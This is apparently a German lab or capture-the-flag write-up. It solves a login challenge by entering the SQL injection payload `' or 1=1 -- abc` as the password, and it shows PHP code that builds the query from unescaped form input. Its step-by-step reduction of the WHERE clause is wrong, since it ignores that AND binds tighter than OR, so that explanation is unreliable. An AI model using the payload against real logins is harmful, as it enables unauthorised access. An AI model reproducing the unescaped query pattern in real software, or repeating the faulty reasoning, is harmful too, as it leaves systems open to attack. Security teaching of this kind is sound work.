# SQL Injection

Gegeben ist eine Login-Form.
Ziel ist es, sich als Nutzer `max` anzumelden.
Sein Passwort kennen wir nicht.

![](sql-injection.png)

## Lösung

Wir geben folgenden Daten ein:

- **Benuzername**: `max`
- **Passwort**: `' or 1=1 -- abc`

Auf dem Server wird das dann etwa so ausgeführt:
```php
<?php
function checkLogin() {
    $user = $_POST['user']; // ESCAPE FEHLT!!!!
    $password = $_POST['password']; // ESCAPE FEHLT!!!!

    $query = "SELECT * FROM users"
           . " WHERE user = '$user'"
           . " AND password='$password'"; // Siehe Hint
    return doesQueryReturnAnyRow($query);
}

if (checkLogin()) {
    echo "Information: Task solved!";
}
```
Mit unsere Eingabe kann man sich die Evaluierung
des `WHERE`-Teils der Anfrage in der Datenbank
in etwa so Vorstellen:
```sql
WHERE user = '$user' AND password='$password'
<=> WHERE user = 'max' AND password='' or 1=1 -- abc'
<=> WHERE user = 'max' AND 1=1 -- abc'
<=> WHERE user = 'max' -- abc'
<=> WHERE user = 'max'
```
Also Login wir mit `max` ein,
ohne sein Passwort zu kennen.
